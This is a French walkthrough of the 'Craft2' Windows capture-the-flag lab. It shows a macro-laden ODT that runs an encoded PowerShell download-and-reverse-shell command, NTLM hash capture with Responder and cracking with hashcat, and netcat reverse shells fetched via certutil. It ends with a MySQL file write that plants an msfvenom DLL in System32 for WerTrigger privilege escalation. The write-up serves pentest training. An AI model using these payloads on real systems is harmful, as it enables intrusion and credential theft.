# Craft2 `odt` `responder` `ntlm` `file write` `WerTrigger` `phpmyadmin` * Nom machine : Craft2 * Difficulté : Difficile * OS : Windows ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-21 15:06 EDT Nmap scan report for 192.168.228.188 Host is up (0.034s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) |_http-title: Craft |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 49666/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### HTTP (80) Nous allons commencer par analyser la page. Dans le menu on ne peut cliquer sur "admin login", on nous indique c'est encore en construction. Tout en bas on voit une adresse mail : . Nous allons ajouter me nom de domaine dans /etc/hosts Juste au-dessus, nous pouvons voir que nous pouvons uploader un fichier, mais seulement ODT. Si nous fournissons bien un fichier ODT :

Cela nous donne un bon indice sur la marche à suivre... ``` ┌──(kali㉿kali)-[~] └─$ dirsearch -u 192.168.228.188 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET Threads: 25 | Wordlist size: 11460 Output File: /home/kali/reports/_192.168.228.188/_24-08-21_15-06-39.txt Target: http://192.168.228.188/ [15:06:45] Starting: [15:06:46] 301 - 339B - /js -> http://192.168.228.188/js/ [15:06:46] 403 - 304B - /%C0%AE%C0%AE%C0%AF [15:06:46] 403 - 304B - /%3f/ [15:06:46] 403 - 304B - /%ff [15:06:47] 403 - 304B - /.ht_wsr.txt [15:06:47] 403 - 304B - /.htaccess.bak1 [15:06:47] 403 - 304B - /.htaccess.sample [15:06:47] 403 - 304B - /.htaccess.save [15:06:47] 403 - 304B - /.htaccess.orig [15:06:47] 403 - 304B - /.htaccess_extra [15:06:47] 403 - 304B - /.htaccess_sc [15:06:47] 403 - 304B - /.htaccess_orig [15:06:47] 403 - 304B - /.htaccessOLD [15:06:47] 403 - 304B - /.html [15:06:47] 403 - 304B - /.htaccessOLD2 [15:06:47] 403 - 304B - /.htm [15:06:47] 403 - 304B - /.htaccessBAK [15:06:47] 403 - 304B - /.htpasswds [15:06:47] 403 - 304B - /.htpasswd_test [15:06:47] 403 - 304B - /.httr-oauth [15:06:54] 301 - 343B - /assets -> http://192.168.228.188/assets/ [15:06:54] 200 - 1KB - /assets/ [15:06:55] 403 - 304B - /cgi-bin/ [15:06:55] 200 - 2KB - /cgi-bin/printenv.pl [15:06:56] 301 - 340B - /css -> http://192.168.228.188/css/ [15:06:59] 503 - 404B - /examples/websocket/index.xhtml [15:06:59] 503 - 404B - /examples/servlets/servlet/CookieExample [15:06:59] 503 - 404B - /examples/servlet/SnoopServlet [15:06:59] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/ [15:06:59] 503 - 404B - /examples/jsp/index.html [15:06:59] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample [15:06:59] 503 - 404B - /examples/ [15:06:59] 503 - 404B - /examples/jsp/snp/snoop.jsp [15:06:59] 503 - 404B - /examples [15:06:59] 503 - 404B - /examples/servlets/index.html [15:07:00] 403 - 304B - /index.php::$DATA [15:07:01] 200 - 981B - /js/ [15:07:05] 403 - 423B - /phpmyadmin [15:07:06] 403 - 423B - /phpmyadmin/doc/html/index.html [15:07:06] 403 - 423B - /phpmyadmin/README [15:07:06] 403 - 423B - /phpmyadmin/scripts/setup.php [15:07:06] 403 - 423B - /phpmyadmin/ChangeLog [15:07:06] 403 - 423B - /phpmyadmin/ [15:07:06] 403 - 423B - /phpmyadmin/phpmyadmin/index.php [15:07:06] 403 - 423B - /phpmyadmin/index.php [15:07:06] 403 - 423B - /phpmyadmin/docs/html/index.html [15:07:08] 403 - 423B - /server-info [15:07:08] 403 - 423B - /server-status [15:07:08] 403 - 423B - /server-status/ [15:07:12] 403 - 304B - /Trace.axd::$DATA [15:07:12] 200 - 537B - /upload.php [15:07:12] 301 - 344B - /uploads -> http://192.168.228.188/uploads/ [15:07:12] 200 - 777B - /uploads/ [15:07:14] 403 - 304B - /web.config::$DATA [15:07:14] 403 - 423B - /webalizer [15:07:14] 403 - 423B - /webalizer/ ``` ## Accès initial Notre payload : ``` IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.189/powercat.ps1');powercat -c 192.168.45.189 -p 4444 -e powershell ``` Il faut lancer un serveur python et avoir powercat.ps1 sur sa machine. Nous allons ensuite encoder le payload en base64. Nous allons ensuite executé ce script python. ``` str = "powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY3QKU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xODkvcG93ZXJjYXQucHMxJyk7cG93ZXJjYXQgLWMKMTkyLjE2OC40NS4xODkgLXAgNDQ0NCAtZSBwb3dlcnNoZWxs" n = 50 for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"') ``` Nous créeons notre macro sur libreoffice : ``` Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -e SUVYKE5ldy1PYmplY" Str = Str + "3QKU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5" Str = Str + "nKCdodHRwOi8vMTkyLjE2OC40NS4xODkvcG93ZXJjYXQucHMxJ" Str = Str + "yk7cG93ZXJjYXQgLWMKMTkyLjE2OC40NS4xODkgLXAgNDQ0NCA" Str = Str + "tZSBwb3dlcnNoZWxs" CreateObject("Wscript.Shell").Run Str End Sub ``` Nous avons réessayé avec un autre port, mais sans succès. Nous avons trouvé un autre moyen d'exploiter ces fichiers odt : ``` ┌──(kali㉿kali)-[~/oscp/craft2] └─$ python3 script2.py ____ __ ____ ____ ______ / __ )____ _____/ / / __ \/ __ \/ ____/ / __ / __ `/ __ /_____/ / / / / / / /_ / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/ /_____/\__,_/\__,_/ \____/_____/_/ Create a malicious ODF document help leak NetNTLM Creds By Richard Davy @rd_pentest www.secureyourit.co.uk Please enter IP of listener: 192.168.45.189 ``` On lance Responder puis on upload le fichier odt précédement crée. ``` ┌──(kali㉿kali)-[~] └─$ sudo responder -I tun0 -v {...} [SMB] NTLMv2-SSP Client : 192.168.228.188 [SMB] NTLMv2-SSP Username : CRAFT2\thecybergeek [SMB] NTLMv2-SSP Hash : thecybergeek::CRAFT2:0f130dd97abf8f79:9CF360DF80045B292C9C5D6820024711:010100000000000080D4BC21E3F3DA01FBBD0D669E48E92E0000000002000800380035003500520001001E00570049004E002D004F00430051005100480052004E00590053005400380004003400570049004E002D004F00430051005100480052004E0059005300540038002E0038003500350052002E004C004F00430041004C000300140038003500350052002E004C004F00430041004C000500140038003500350052002E004C004F00430041004C000700080080D4BC21E3F3DA010600040002000000080030003000000000000000000000000030000000EC7CA1882CB50297357209482D722C2F3D41A566D0CC3BD5A56B55A058CBB00A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380039000000000000000000 {...} ``` Nous obtenons le hash NTLM de thecybergeek ``` ┌──(kali㉿kali)-[~/oscp/craft2] └─$ hashcat -m 5600 'thecybergeek::CRAFT2:dbcc813b3db59f01:4635C6B73B27A3E35B1FFFF8CF5D7D60:010100000000000080D4BC21E3F3DA01C27DA16F0687F9B80000000002000800380035003500520001001E00570049004E002D004F00430051005100480052004E00590053005400380004003400570049004E002D004F00430051005100480052004E0059005300540038002E0038003500350052002E004C004F00430041004C000300140038003500350052002E004C004F00430041004C000500140038003500350052002E004C004F00430041004C000700080080D4BC21E3F3DA010600040002000000080030003000000000000000000000000030000000EC7CA1882CB50297357209482D722C2F3D41A566D0CC3BD5A56B55A058CBB00A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380039000000000000000000' /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ================================================================================================================================================== * Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11700F @ 2.50GHz, 7852/15768 MB (2048 MB allocatable), 5MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Initializing backend runtime for device #1. Please be patient.Host memory required for this attack: 1 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 THECYBERGEEK::CRAFT2:dbcc813b3db59f01:4635c6b73b27a3e35b1ffff8cf5d7d60:010100000000000080d4bc21e3f3da01c27da16f0687f9b80000000002000800380035003500520001001e00570049004e002d004f00430051005100480052004e00590053005400380004003400570049004e002d004f00430051005100480052004e0059005300540038002e0038003500350052002e004c004f00430041004c000300140038003500350052002e004c004f00430041004c000500140038003500350052002e004c004f00430041004c000700080080d4bc21e3f3da010600040002000000080030003000000000000000000000000030000000ec7ca1882cb50297357209482d722c2f3d41a566d0cc3bd5a56b55a058cbb00a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100380039000000000000000000:winniethepooh Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: THECYBERGEEK::CRAFT2:dbcc813b3db59f01:4635c6b73b27a...000000 Time.Started.....: Wed Aug 21 16:05:31 2024 (0 secs) Time.Estimated...: Wed Aug 21 16:05:31 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1313.2 kH/s (2.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 5120/14344385 (0.04%) Rejected.........: 0/5120 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: 123456 -> babygrl Hardware.Mon.#1..: Util: 19% Started: Wed Aug 21 16:05:20 2024 Stopped: Wed Aug 21 16:05:32 2024 ``` thecybergeek:winniethepooh ``` ┌──(kali㉿kali)-[~] └─$ smbmap -H 192.168.228.188 -u thecybergeek -p winniethepooh ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 192.168.228.188:445 Name: craft.offsec Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC WebApp READ, WRITE ``` Nous pouvons lire et écrire dans le dossier WebApp. Nous allons donc nous y connecter et y transférer un shell.php qui nous permettra d'exécuter des commandes. ``` ┌──(kali㉿kali)-[~] └─$ smbclient //192.168.228.188/WebApp -U thecybergeek Password for [WORKGROUP\thecybergeek]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Aug 21 16:14:01 2024 .. D 0 Wed Aug 21 16:14:01 2024 assets D 0 Tue Apr 5 12:16:03 2022 css D 0 Tue Apr 5 12:16:03 2022 index.php A 9768 Mon Jan 31 11:21:52 2022 js D 0 Tue Apr 5 12:16:03 2022 upload.php A 896 Mon Jan 31 10:23:02 2022 uploads D 0 Wed Aug 21 16:01:34 2024 10327807 blocks of size 4096. 2005335 blocks available ``` Enumérer les dossiers nous permet de savoir où nous nous trouvons. ``` ┌──(kali㉿kali)-[~] └─$ cat shell2.php

``` ``` smb: \> put shell2.php putting file shell2.php as \shell2.php (1.2 kb/s) (average 1.2 kb/s) ```

Nous avons ajouté nc.exe à la machine puis utiliser netcat pour obtenir un reverse shell. ``` certutil -f -urlcache http://192.168.45.189/Tools/nc.exe nc.exe nc.exe 192.168.45.189 135 -e powershell ``` ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 135 listening on [any] 135 ... connect to [192.168.45.189] from (UNKNOWN) [192.168.228.188] 49778 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\xampp\htdocs> whoami whoami craft2\apache ``` ## Elévation des privilèges Nous allons tout d'abord nous connecter à l'utilisateur précédement trouvé grâce à l'exécutable : RunasCs.exe. Nous le téléchargons tout d'abord sur la machine puis l'exécutons. ``` PS C:\xampp\htdocs> iwr -uri http://192.168.45.189/Tools/RunasCs.exe -Outfile runas.exe PS C:\xampp\htdocs> ./runas.exe thecybergeek winniethepooh "./nc.exe 192.168.45.189 135 -e powershell" ``` ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 135 listening on [any] 135 ... connect to [192.168.45.189] from (UNKNOWN) [192.168.228.188] 49787 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami craft2\thecybergeek ``` Nous allons exécuter winpeas ``` PS C:\xampp\htdocs> iwr -uri http://192.168.45.189/Tools/winpeas.exe -Outfile winpeas.exe iwr -uri http://192.168.45.189/Tools/winpeas.exe -Outfile winpeas.exe PS C:\xampp\htdocs> ./winpeas.exe ``` On peut voir qu'il y a un service mySQL et Apache. Nous allons effectuer une redirection de port afin d'avoir accès à phpmyadmin avec chisel. Nous allons le télécharger sur la cible. ``` ┌──(kali㉿kali)-[~] └─$ chisel server -p 7777 -reverse 2024/08/21 17:15:45 server: Reverse tunnelling enabled 2024/08/21 17:15:45 server: Fingerprint fU6r3mB4dXTcSLuuuoUCn7H5ffevafMnMKu+Vbc+XDA= 2024/08/21 17:15:45 server: Listening on http://0.0.0.0:7777 PS C:\xampp\htdocs> ./chisel.exe client 192.168.45.189:7777 R:8888:127.0.0.1:80 ```

Nous allons voir quels droits nous avons sur un fichier lorsqu'un fait une requête SQL. ``` SELECT LOAD_FILE('C:/Users/Administrator/Desktop/proof.txt') INTO DUMPFILE "C:\\proof.txt" ``` Nous allons voir comment obtenir un shell. {% embed url="" %} Il y 4 méthodes différentes. Nous allons utiliser WerTrigger. Nous allons cloner le depôt github puis transférer les fichiers à la cible, Report.wer et WerTrigger.exe doivent bien être dans le même directoire (ici C:\xampp\htdocs), soit via smb soit via certutil/iwr. Nous allons profiter de nos droits pour écrire phoneinfo.dll dans C:\Windows\System32 ``` SELECT LOAD_FILE("C:\\xampp\\htdocs\\phoneinfo.dll") INTO DUMPFILE "C:\\Windows\\System32\\phoneinfo.dll" ``` Nous pouvons exécuter l'exploit ! ``` PS C:\xampp\htdocs> ./WerTrigger.exe whoami ``` Pas de retour. Nous allons essayer différement. Nous allons tester de générer un reverse shell directement avec le fichier phoneinfo.dll. ``` ┌──(kali㉿kali)-[~] └─$ msfvenom -platform windows --arch x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.189 LPORT=443 -f dll -o phoneinfo.dll ``` Nous avons réinitialisé la machine et recommencé les étapes précédentes, en remplacant le fichier phoneinfo.dll par celui que nous venons de générer. On exécute l'exploit... Ca marche ! ``` ┌──(kali㉿kali)-[~/oscp/WerTrigger/bin] └─$ nc -lnvp 443 listening on [any] 443 ... connect to [192.168.45.189] from (UNKNOWN) [192.168.178.188] 49724 dir Microsoft Windows [Version 10.0.17763.2746] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ``` Nous sommes bien nt authory\system. En regardant le code source sur GitHub, nous pouvons voir que le fichier phoneinfo.dll ouvre le port 1337, peut-être est-ce cela qui a fait que cela ne fonctionne pas.